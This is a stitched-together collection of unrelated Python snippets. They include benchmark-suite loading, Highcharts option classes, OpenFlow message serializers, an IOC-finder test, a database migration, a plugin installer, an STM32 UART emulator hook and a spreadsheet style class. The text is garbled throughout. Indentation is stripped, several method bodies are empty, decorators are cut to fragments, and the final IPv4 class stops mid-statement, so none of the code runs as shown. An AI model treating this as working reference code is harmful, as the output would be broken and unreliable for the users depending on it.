reldir = info.reldir
reporoot = os.path.join(cls.REPOS, os.path.basename(url))
if (not os.path.exists(reporoot)):
if (not os.path.exists(cls.REPOS)):
os.makedirs(cls.REPOS)
_utils.git('clone', url, reporoot, cwd=None)
names = cls._get_names(os.path.join(reporoot, reldir))
return list(names)
def _get_names(cls, benchmarksdir: str) -> Iterable[str]:
manifest = os.path.join(benchmarksdir, 'MANIFEST')
if os.path.isfile(manifest):
with open(manifest) as infile:
for line in infile:
if (line.strip() == '[benchmarks]'):
for line in infile:
if (line.strip() == 'name\tmetafile'):
break
else:
raise NotImplementedError(manifest)
break
else:
raise NotImplementedError(manifest)
for line in infile:
if line.startswith('['):
break
line = line.strip()
if ((not line) or line.startswith('#')):
continue
(name, _) = line.split('\t')
(yield name)
else:
for name in os.listdir(benchmarksdir):
if name.startswith('bm_'):
(yield name[3:])
def _iter_subcandidates(cls, bench: str) -> Iterable[str]:
while ('_' in bench):
(bench, _, _) = bench.rpartition('_')
(yield bench)
def __init__(self):
self._cache = {}
def __eq__(self, other):
raise NotImplementedError
def get_suites(self, benchmarks: Iterable[str], default: Optional[str]=None) -> Dict[(str, Optional[str])]:
mapped: Dict[(str, Optional[str])] = {}
suite: Any
by_bench = self.load('name')
for bench in benchmarks:
try:
suite = by_bench[bench]
except KeyError:
for sub in self._iter_subcandidates(bench):
if (sub in by_bench):
suite = by_bench[sub]
break
else:
suite = default
if ((suite is None) or isinstance(suite, str)):
mapped[bench] = suite
else:
raise TypeError(f'Invalid suite type {type(suite)}')
return mapped
def get_suite(self, bench: str, default: Optional[str]=None) -> Optional[str]:
by_suite = (self._cache if self._cache else self._load())
suite = self._get_suite(bench, by_suite)
if suite:
return suite
for sub in self._iter_subcandidates(bench):
suite = self._get_suite(sub, by_suite)
if suite:
return suite
else:
return default
def _get_suite(self, bench, by_suite):
for (suite, names) in by_suite.items():
if (bench in names):
return suite
else:
return None
def load(self, key: str='name') -> Union[(Dict[(str, List[str])], Dict[(str, str)])]:
by_suite = self._load()
if (key == 'suite'):
return {s: list(n) for (s, n) in by_suite.items()}
elif (key == 'name'):
by_name = {}
for (suite, names) in by_suite.items():
for name in names:
if (name in by_name):
raise NotImplementedError((suite, name))
by_name[name] = suite
return by_name
else:
raise ValueError(f'unsupported key {key!r}')
def _load(self):
for suite in self.SUITES:
if (suite not in self._cache):
self._cache[suite] = self._load_suite(suite)
return self._cache |
class OptionPlotoptionsPyramidSonificationDefaultinstrumentoptionsMappingHighpassResonance(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class port_desc_stats_reply(stats_reply):
version = 5
type = 19
stats_type = 13
def __init__(self, xid=None, flags=None, entries=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (flags != None):
self.flags = flags
else:
self.flags = 0
if (entries != None):
self.entries = entries
else:
self.entries = []
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!H', self.stats_type))
packed.append(struct.pack('!H', self.flags))
packed.append(('\x00' * 4))
packed.append(loxi.generic_util.pack_list(self.entries))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = port_desc_stats_reply()
_version = reader.read('!B')[0]
assert (_version == 5)
_type = reader.read('!B')[0]
assert (_type == 19)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_stats_type = reader.read('!H')[0]
assert (_stats_type == 13)
obj.flags = reader.read('!H')[0]
reader.skip(4)
obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.port_desc.unpack)
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.flags != other.flags):
return False
if (self.entries != other.entries):
return False
return True
def pretty_print(self, q):
q.text('port_desc_stats_reply {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('flags = ')
value_name_map = {1: 'OFPSF_REPLY_MORE'}
q.text(util.pretty_flags(self.flags, value_name_map.values()))
q.text(',')
q.breakable()
q.text('entries = ')
q.pp(self.entries)
q.breakable()
q.text('}') |
class SetItemObserver():
__slots__ = ('notify', 'optional')
def __init__(self, *, notify, optional):
self.notify = notify
self.optional = optional
def __hash__(self):
return hash((type(self).__name__, self.notify, self.optional))
def __eq__(self, other):
return ((type(self) is type(other)) and (self.notify == other.notify) and (self.optional == other.optional))
def __repr__(self):
formatted_args = [f'notify={self.notify!r}', f'optional={self.optional!r}']
return f"{self.__class__.__name__}({', '.join(formatted_args)})"
def iter_observables(self, object):
if (not isinstance(object, TraitSet)):
if self.optional:
return
raise ValueError('Expected a TraitSet to be observed, got {!r} (type: {!r})'.format(object, type(object)))
(yield object)
def iter_objects(self, object):
if (not isinstance(object, TraitSet)):
if self.optional:
return
raise ValueError('Expected a TraitSet to be observed, got {!r} (type: {!r})'.format(object, type(object)))
(yield from object)
def get_notifier(self, handler, target, dispatcher):
return TraitEventNotifier(handler=handler, target=target, dispatcher=dispatcher, event_factory=set_event_factory, prevent_event=(lambda event: False))
def get_maintainer(self, graph, handler, target, dispatcher):
return ObserverChangeNotifier(observer_handler=_observer_change_handler, event_factory=set_event_factory, prevent_event=(lambda event: False), graph=graph, handler=handler, target=target, dispatcher=dispatcher)
def iter_extra_graphs(self, graph):
(yield from ()) |
def test_authentihash():
names = ['authentihash']
templates = ['{} 3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4', '{} 3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4', '{}: 3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4', '{}: 3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4', '{} - 3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4', '{}-3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4', '{}\t3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4', '{}\n3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4']
for template in templates:
for name in names:
print(template)
iocs = find_iocs(template.format(name))
assert (len(iocs['authentihashes']) == 1)
assert (iocs['authentihashes'] == ['3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4'])
assert (len(iocs['sha256s']) == 0)
iocs = find_iocs(template.format(name.upper()))
assert (len(iocs['authentihashes']) == 1)
assert (iocs['authentihashes'] == ['3f1b149d07e7e8636636b8b7f7043c40ed64a10bfb046c498432c2d4'])
assert (len(iocs['sha256s']) == 0) |
class OptionSeriesVennSonificationDefaultinstrumentoptions(Options):
def activeWhen(self) -> 'OptionSeriesVennSonificationDefaultinstrumentoptionsActivewhen':
return self._config_sub_data('activeWhen', OptionSeriesVennSonificationDefaultinstrumentoptionsActivewhen)
def instrument(self):
return self._config_get('piano')
def instrument(self, text: str):
self._config(text, js_type=False)
def mapping(self) -> 'OptionSeriesVennSonificationDefaultinstrumentoptionsMapping':
return self._config_sub_data('mapping', OptionSeriesVennSonificationDefaultinstrumentoptionsMapping)
def midiName(self):
return self._config_get(None)
def midiName(self, text: str):
self._config(text, js_type=False)
def pointGrouping(self) -> 'OptionSeriesVennSonificationDefaultinstrumentoptionsPointgrouping':
return self._config_sub_data('pointGrouping', OptionSeriesVennSonificationDefaultinstrumentoptionsPointgrouping)
def roundToMusicalNotes(self):
return self._config_get(True)
def roundToMusicalNotes(self, flag: bool):
self._config(flag, js_type=False)
def showPlayMarker(self):
return self._config_get(True)
def showPlayMarker(self, flag: bool):
self._config(flag, js_type=False)
def type(self):
return self._config_get('instrument')
def type(self, text: str):
self._config(text, js_type=False) |
class CellDerivatives(FilterBase):
__version__ = 0
filter = Instance(tvtk.CellDerivatives, args=(), allow_none=False, record=True)
input_info = PipelineInfo(datasets=['any'], attribute_types=['any'], attributes=['any'])
output_info = PipelineInfo(datasets=['any'], attribute_types=['any'], attributes=['any'])
def has_output_port(self):
return True
def get_output_object(self):
return self.filter.output_port |
def upgrade():
op.add_column('rss_parser_funcs', sa.Column('last_changed', sa.DateTime(), nullable=True))
op.add_column('rss_parser_funcs_version', sa.Column('last_changed', sa.DateTime(), autoincrement=False, nullable=True))
bind = op.get_bind()
sess = Session(bind=bind)
print('Updating date/time stamps for functions.')
sess.query(RssFeedEntry).update({'last_changed': datetime.datetime.now()})
sess.commit()
print('Update done.')
op.alter_column('rss_parser_funcs', 'last_changed', nullable=False) |
class AbstractPluginInstaller():
_skip_docker_env = (os.getenv('FACT_INSTALLER_SKIP_DOCKER') is not None)
base_path = None
def __init__(self, distribution: (str | None)=None, skip_docker: bool=_skip_docker_env):
self.distribution = (distribution or check_distribution())
self.build_path = (self.base_path / 'build')
self.skip_docker = skip_docker
def install(self):
cwd = os.getcwd()
os.chdir(self.base_path)
self.install_system_packages()
self.install_pip_packages()
self.install_other_packages()
self.install_files()
try:
self.build_path.mkdir(exist_ok=True)
os.chdir(self.build_path)
self.build()
finally:
run_cmd_with_logging(f'sudo rm -rf {self.build_path}')
os.chdir(self.base_path)
if (not self.skip_docker):
self.install_docker_images()
os.chdir(cwd)
def install_docker_images(self):
def install_system_packages(self):
build_pkg_path = Path(('./apt-pkgs-build.txt' if (self.distribution != 'fedora') else './dnf-pkgs-build.txt'))
runtime_pkg_path = Path(('./apt-pkgs-runtime.txt' if (self.distribution != 'fedora') else './dnf-pkgs-runtime.txt'))
pkg_list = (_read_packages(build_pkg_path) + _read_packages(runtime_pkg_path))
pgk_mgr_cmd = ('apt install -y' if (self.distribution != 'fedora') else 'dnf install -y')
pkgs_to_install = ' '.join(pkg_list)
if (len(pkgs_to_install) == 0):
return
run_cmd_with_logging(f'sudo {pgk_mgr_cmd} {pkgs_to_install}')
def install_pip_packages(self):
requirements_path = (self.base_path / 'requirements.txt')
if requirements_path.exists():
install_pip_packages(requirements_path)
def install_other_packages(self):
def install_files(self):
def build(self):
def _build_docker_image(self, tag: str, dockerfile_path: (Path | None)=None):
if (not dockerfile_path):
dockerfile_path = (self.base_path / 'docker')
run_cmd_with_logging(f'docker build -t {tag} {dockerfile_path}') |
def _prepare_executable(repository_path: str, exe_path: str, package_name: str, version: str) -> str:
exe_name = _parse_package_name(package_name)
executable = _build_executable_path(exe_path, exe_name)
if (repository_path.upper() != 'LOCAL'):
_download_executables(repository_path, exe_path, package_name, version)
else:
logger.info('Local repository, skip download and attestation ...')
if (not os.access(executable, os.X_OK)):
os.chmod(executable, (os.stat(executable).st_mode | stat.S_IEXEC))
return executable |
def extractHyakurosTumblrCom(item):
badwords = ['Manga']
if any([(bad in item['tags']) for bad in badwords]):
return None
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class TestLabel():
def setup_method(self):
class TestSerializer(serializers.Serializer):
labeled = serializers.IntegerField(label='My label')
self.serializer = TestSerializer()
def test_label(self):
fields = self.serializer.fields
assert (fields['labeled'].label == 'My label') |
def load_packages_and_modules(ss: SerializationSettings, project_root: Path, pkgs_or_mods: typing.List[str], options: typing.Optional[Options]=None) -> typing.List[FlyteControlPlaneEntity]:
ss.git_repo = _get_git_repo_url(project_root)
pkgs_and_modules = []
for pm in pkgs_or_mods:
p = Path(pm).resolve()
rel_path_from_root = p.relative_to(project_root)
dot_delineated = os.path.splitext(rel_path_from_root)[0].replace(os.path.sep, '.')
logger.debug(f'User specified arg {pm} has {str(rel_path_from_root)} relative path loading it as {dot_delineated}')
pkgs_and_modules.append(dot_delineated)
registrable_entities = serialize(pkgs_and_modules, ss, str(project_root), options)
return registrable_entities |
class TestActionController(unittest.TestCase):
def setUp(self):
self.memo = []
def perform():
self.memo.append('called')
self.action = Action(name='Test', on_perform=perform)
self.action_controller = ActionController()
def test_perform(self):
event = ActionEvent()
self.action_controller.perform(self.action, event)
self.assertEqual(self.memo, ['called'])
def test_perform_none(self):
action = Action(name='Test')
event = ActionEvent()
self.action_controller.perform(action, event)
def test_can_add_to_menu(self):
result = self.action_controller.can_add_to_menu(self.action)
self.assertTrue(result)
def test_add_to_menu(self):
self.action_controller.add_to_menu(self.action)
def test_can_add_to_toolbar(self):
result = self.action_controller.can_add_to_toolbar(self.action)
self.assertTrue(result)
def test_add_to_toolbar(self):
self.action_controller.add_to_toolbar(self.action) |
_stats_reply_type(ofproto.OFPST_GROUP)
class OFPGroupStats(StringifyMixin):
def __init__(self, group_id, ref_count, packet_count, byte_count, bucket_counters, length=None):
super(OFPGroupStats, self).__init__()
self.group_id = group_id
self.ref_count = ref_count
self.packet_count = packet_count
self.byte_count = byte_count
self.bucket_counters = bucket_counters
self.length = length
def parser(cls, buf, offset):
(length, group_id, ref_count, packet_count, byte_count) = struct.unpack_from(ofproto.OFP_GROUP_STATS_PACK_STR, buf, offset)
bucket_len = (length - ofproto.OFP_GROUP_STATS_SIZE)
offset += ofproto.OFP_GROUP_STATS_SIZE
bucket_counters = []
while (bucket_len > 0):
bucket_counters.append(OFPBucketCounter.parser(buf, offset))
offset += ofproto.OFP_BUCKET_COUNTER_SIZE
bucket_len -= ofproto.OFP_BUCKET_COUNTER_SIZE
o = cls(group_id, ref_count, packet_count, byte_count, bucket_counters)
o.length = length
return o |
def _expand_window_ragged(model: Model[(InT, InT)], Xr: Ragged) -> Tuple[(Ragged, Callable)]:
nW = model.attrs['window_size']
Y = Ragged(model.ops.seq2col(cast(Floats2d, Xr.data), nW, lengths=Xr.lengths), Xr.lengths)
def backprop(dYr: Ragged) -> Ragged:
return Ragged(model.ops.backprop_seq2col(cast(Floats2d, dYr.data), nW, lengths=Xr.lengths), Xr.lengths)
return (Y, backprop) |
_FrrZebraMessageBody.register_unknown_type()
_ZebraMessageBody.register_unknown_type()
class ZebraUnknownMessage(_ZebraMessageBody):
def __init__(self, buf):
super(ZebraUnknownMessage, self).__init__()
self.buf = buf
def parse(cls, buf, version=_DEFAULT_VERSION):
return cls(buf)
def serialize(self, version=_DEFAULT_VERSION):
return self.buf |
def test_expected_mocking_and_stubbing_fixtures_ooo():
assert (fixtures_test_module.TestMockingAndStubbingFixtures.get_order_of_operations() == ['setup_class', 'set_up_test_fixture', 'setup_method', 'set_up_test_case.mocking_test.simple_mock_works', 'set_up_test_case_action.mocking_test.simple_mock_works.mocking_test', 'tear_down_test_case_action.mocking_test.simple_mock_works.mocking_test', 'tear_down_test_case.mocking_test.simple_mock_works', 'teardown_method', 'setup_method', 'set_up_test_case.mocking_test.mock_randint_exception', 'set_up_test_case_action.mocking_test.mock_randint_exception.mocking_test', 'tear_down_test_case_action.mocking_test.mock_randint_exception.mocking_test', 'tear_down_test_case.mocking_test.mock_randint_exception', 'teardown_method', 'setup_method', 'set_up_test_case.mocking_test.mock_function_exception', 'set_up_test_case_action.mocking_test.mock_function_exception.mocking_test', 'tear_down_test_case_action.mocking_test.mock_function_exception.mocking_test', 'tear_down_test_case.mocking_test.mock_function_exception', 'teardown_method', 'setup_method', 'set_up_test_case.mocking_test.mock_delete', 'set_up_test_case_action.mocking_test.mock_delete.mocking_test', 'tear_down_test_case_action.mocking_test.mock_delete.mocking_test', 'tear_down_test_case.mocking_test.mock_delete', 'teardown_method', 'setup_method', 'set_up_test_case.mocking_test.mock_at_test_level_with_multiple_actions', 'set_up_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'tear_down_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'set_up_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'tear_down_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'set_up_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'tear_down_test_case_action.mocking_test.mock_at_test_level_with_multiple_actions.mocking_test', 'tear_down_test_case.mocking_test.mock_at_test_level_with_multiple_actions', 'teardown_method', 'tear_down_test_fixture', 'set_up_test_fixture', 'setup_method', 'set_up_test_case.stubbing_test.simple_stub_works', 'set_up_test_case_action.stubbing_test.simple_stub_works.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.simple_stub_works.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.simple_stub_works', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.simple_error_works', 'set_up_test_case_action.stubbing_test.simple_error_works.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.simple_error_works.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.simple_error_works', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.simple_field_error_works', 'set_up_test_case_action.stubbing_test.simple_field_error_works.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.simple_field_error_works.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.simple_field_error_works', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.one_stub_multiple_calls', 'set_up_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_stub_multiple_calls.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.one_stub_multiple_calls', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.one_error_stub_multiple_error_calls', 'set_up_test_case_action.stubbing_test.one_error_stub_multiple_error_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_error_stub_multiple_error_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.one_error_stub_multiple_error_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.one_error_stub_multiple_error_calls.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.one_error_stub_multiple_error_calls', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.multiple_stubs_multiple_calls', 'set_up_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'set_up_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'tear_down_test_case_action.stubbing_test.multiple_stubs_multiple_calls.stubbing_test_one_action', 'tear_down_test_case.stubbing_test.multiple_stubs_multiple_calls', 'teardown_method', 'setup_method', 'set_up_test_case.stubbing_test.multiple_stubs_one_call', 'set_up_test_case_action.stubbing_test.multiple_stubs_one_call.stubbing_test_two_actions', 'tear_down_test_case_action.stubbing_test.multiple_stubs_one_call.stubbing_test_two_actions', 'tear_down_test_case.stubbing_test.multiple_stubs_one_call', 'teardown_method', 'tear_down_test_fixture', 'teardown_class']) |
def _get_section_label_and_title_text_from_layout_block(layout_block: LayoutBlock) -> Tuple[(Optional[str], str)]:
(section_label_layout_block, section_title_layout_block) = get_section_label_and_title_from_layout_block(layout_block)
return (_get_layout_block_text(section_label_layout_block), section_title_layout_block.text) |
class RpmBuild(Build):
epoch = Column(Integer, default=0)
__mapper_args__ = {'polymorphic_identity': ContentType.rpm}
def evr(self):
if (not self.epoch):
self.epoch = self._get_kojiinfo()['epoch']
if (not self.epoch):
self.epoch = 0
return (str(self.epoch), str(self.nvr_version), str(self.nvr_release))
def get_latest(self):
koji_session = buildsys.get_session()
latest = None
evr = self.evr
for tag in [self.release.stable_tag, self.release.dist_tag]:
builds = koji_session.listTagged(tag, package=self.package.name, inherit=True)
for build in builds:
old_evr = build_evr(build)
if (rpm.labelCompare(evr, old_evr) > 0):
latest = build['nvr']
break
if latest:
break
return latest
def get_changelog(self, timelimit=0, lastupdate=False):
rpm_header = get_rpm_header(self.nvr)
descrip = rpm_header['changelogtext']
if (not descrip):
return ''
who = rpm_header['changelogname']
when = rpm_header['changelogtime']
num = len(descrip)
if (not isinstance(when, list)):
when = [when]
if lastupdate:
lastpkg = self.get_latest()
if (lastpkg is not None):
oldh = get_rpm_header(lastpkg)
if oldh['changelogtext']:
timelimit = oldh['changelogtime']
if isinstance(timelimit, list):
timelimit = timelimit[0]
str = ''
i = 0
while ((i < num) and (when[i] > timelimit)):
try:
str += ('* %s %s\n%s\n' % (time.strftime('%a %b %e %Y', time.localtime(when[i])), who[i], descrip[i]))
except Exception:
log.exception('Unable to add changelog entry for header %s', rpm_header)
i += 1
return str |
class bsn_bw_enable_get_request(bsn_header):
version = 6
type = 4
experimenter = 6035143
subtype = 19
def __init__(self, xid=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!L', self.experimenter))
packed.append(struct.pack('!L', self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = bsn_bw_enable_get_request()
_version = reader.read('!B')[0]
assert (_version == 6)
_type = reader.read('!B')[0]
assert (_type == 4)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_experimenter = reader.read('!L')[0]
assert (_experimenter == 6035143)
_subtype = reader.read('!L')[0]
assert (_subtype == 19)
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
return True
def pretty_print(self, q):
q.text('bsn_bw_enable_get_request {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.breakable()
q.text('}') |
_meta(characters.reimu.ReimuExterminateLaunchCard)
class ReimuExterminateLaunchCard():
def effect_string_before(self, act):
if (act.cause == 'damage'):
return f'{N.char(act.source)}: ()( !!!'
else:
return f'{N.char(act.target)},{N.char(act.source)}!'
def sound_effect(self, act):
if (act.cause == 'damage'):
return 'thb-cv-reimu_exterminate_damage'
else:
return 'thb-cv-reimu_exterminate_active' |
class Window(QtWidgets.QDialog, QtWidgets.QPlainTextEdit):
def __init__(self, parent=None):
super().__init__(parent)
self.setGeometry(winx, winy, winwidth, winheight)
self.setWindowTitle(patch.getstring('display', 'title', default='EEGsynth logging'))
layout = QtWidgets.QVBoxLayout()
logTextBox = QTextEditLogger_v2(self)
layout.addWidget(logTextBox.widget)
self.append = logTextBox.append
self.setLayout(layout) |
class STM32F4UART(BPHandler):
def __init__(self, impl=UARTPublisher):
self.model = impl
_handler(['HAL_UART_Init'])
def hal_ok(self, qemu, bp_addr):
log.info('Init Called')
return (True, 0)
_handler(['HAL_UART_GetState'])
def get_state(self, qemu, bp_addr):
log.info('Get State')
return (True, 32)
_handler(['HAL_UART_Transmit', 'HAL_UART_Transmit_IT', 'HAL_UART_Transmit_DMA'])
def handle_tx(self, qemu, bp_addr):
huart = qemu.get_arg(0)
hw_addr = qemu.read_memory(huart, 4, 1)
buf_addr = qemu.get_arg(1)
buf_len = qemu.get_arg(2)
data = qemu.read_memory(buf_addr, 1, buf_len, raw=True)
hal_log.info(('UART %i TX:%s' % (hw_addr, data)))
self.model.write(hw_addr, data)
return (True, 0)
_handler(['HAL_UART_Receive', 'HAL_UART_Receive_IT', 'HAL_UART_Receive_DMA'])
def handle_rx(self, qemu, bp_handler):
huart = qemu.get_arg(0)
hw_addr = qemu.read_memory(huart, 4, 1)
size = qemu.get_arg(2)
log.info(('Waiting for data: %i' % size))
data = self.model.read(hw_addr, size, block=True)
hal_log.info(('UART %i RX: %s' % (hw_addr, data)))
qemu.write_memory(qemu.get_arg(1), 1, data, size, raw=True)
return (True, 0) |
class XLSStyle():
def __init__(self, bold=False, color=None, bgcolor=None, wrap=False, border=None, number_format=None, font_size=None, centre=False, shrink_to_fit=False):
self.bold = bold
self.color = color
self.bgcolor = bgcolor
self.wrap = wrap
self.border = border
self.number_format = number_format
self.font_size = font_size
self.centre = centre
self.shrink_to_fit = shrink_to_fit
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return (self.bold or (self.color is not None) or (self.bgcolor is not None) or self.wrap or (self.border is not None) or (self.number_format is not None) or (self.font_size is not None) or self.centre or self.shrink_to_fit)
def name(self):
name = []
if self.bold:
name.append('bold')
if (self.color is not None):
name.append(('color=%s' % self.color))
if (self.bgcolor is not None):
name.append(('bgcolor=%s' % self.bgcolor))
if self.wrap:
name.append('wrap')
if (self.border is not None):
name.append(('border=%s' % self.border))
if (self.number_format is not None):
name.append(('number_format=%s' % self.number_format))
if (self.font_size is not None):
name.append(('font_size=%s' % self.font_size))
if self.centre:
name.append('centre')
if self.shrink_to_fit:
name.append('shrink_to_fit')
name = '__'.join(name)
if name:
return ('__%s__' % name)
else:
return ''
def style(self, item):
style = []
if self.bold:
style.append('font=bold')
if (self.color is not None):
style.append(('color=%s' % self.color))
if (self.bgcolor is not None):
style.append(('bgcolor=%s' % self.bgcolor))
if self.wrap:
style.append('wrap')
if (self.border is not None):
style.append(('border=%s' % self.border))
if (self.number_format is not None):
style.append(('number_format=%s' % self.excel_number_format))
if (self.font_size is not None):
style.append(('font_size=%s' % self.font_size))
if self.centre:
style.append('centre')
if self.shrink_to_fit:
style.append('shrink_to_fit')
if style:
return ('<style %s>%s</style>' % (' '.join(style), item))
else:
return item
def excel_number_format(self):
if (self.number_format == NumberFormats.THOUSAND_SEPARATOR):
return '#,###'
elif (self.number_format == NumberFormats.PERCENTAGE):
return '0.0%'
return None |
class Command(BaseCommand):
help = 'Update DABS Submission Window Schedule table based on a file or the broker'
def add_arguments(self, parser):
parser.add_argument('--file', help='The file containing schdules. If not provided, schedules are generated based on broker.')
()
def handle(self, *args, **options):
file_path = options['file']
if file_path:
logger.info('Input file provided. Reading schedule from file.')
incoming_schedule_objs = self.read_schedules_from_csv(file_path)
else:
logger.info('No input file provided. Generating schedule from broker.')
incoming_schedule_objs = self.generate_schedules_from_broker()
logger.info('Loading existing DABS Submission Window Schedules')
existing_schedules = list(DABSSubmissionWindowSchedule.objects.all())
existing_schedule_lookup = {}
for schedule in existing_schedules:
existing_schedule_lookup[schedule.id] = schedule
for incoming_schedule in incoming_schedule_objs:
existing_schedule = existing_schedule_lookup.get(int(incoming_schedule.id))
if existing_schedule:
incoming_schedule.submission_reveal_date = existing_schedule.submission_reveal_date
elif (incoming_schedule.submission_reveal_date is None):
incoming_schedule.submission_reveal_date = FUTURE_DATE
incoming_schedule.parse_dates_fields(timezone.utc)
if (incoming_schedule.submission_due_date > datetime.utcnow().replace(tzinfo=timezone.utc)):
incoming_schedule.submission_reveal_date = FUTURE_DATE
logger.info('Deleting existing DABS Submission Window Schedule')
DABSSubmissionWindowSchedule.objects.all().delete()
logger.info('Inserting DABS Submission Window Schedule into website')
DABSSubmissionWindowSchedule.objects.bulk_create(incoming_schedule_objs)
logger.info('DABS Submission Window Schedule loader finished successfully!')
def generate_schedules_from_broker(self):
logger.info('Creating broker cursor')
broker_cursor = connections['data_broker'].cursor()
logger.info('Running MONTH_SCHEDULE_SQL')
broker_cursor.execute(MONTH_SCHEDULE_SQL)
logger.info('Getting month schedule values from cursor')
month_schedule_values = dictfetchall(broker_cursor)
logger.info('Running QUARTER_SCHEDULE_SQL')
broker_cursor.execute(QUARTER_SCHEDULE_SQL)
logger.info('Getting quarter schedule values from cursor')
quarter_schedule_values = dictfetchall(broker_cursor)
submission_schedule_objs = [DABSSubmissionWindowSchedule(**values) for values in month_schedule_values]
submission_schedule_objs += [DABSSubmissionWindowSchedule(**values) for values in quarter_schedule_values]
return submission_schedule_objs
def read_schedules_from_csv(self, file_path):
logger.info('Reading from file: {}'.format(file_path))
with RetrieveFileFromUri(file_path).get_file_object(True) as file:
csv_reader = csv.DictReader(file)
submission_schedule_objs = [DABSSubmissionWindowSchedule(**values) for values in csv_reader]
return submission_schedule_objs |
class OptionSeriesPackedbubbleSonificationDefaultinstrumentoptionsMappingHighpassFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class IPv4Address(BaseV4, BaseIP):
def __init__(self, address):
BaseIP.__init__(self, address)
BaseV4.__init__(self, address)
if isinstance(address, int):
self._ip = address
if ((address < 0) or (address > self._ALL_ONES)):
raise IPv4IpValidationError(address)
return
if _compat_has_real_bytes:
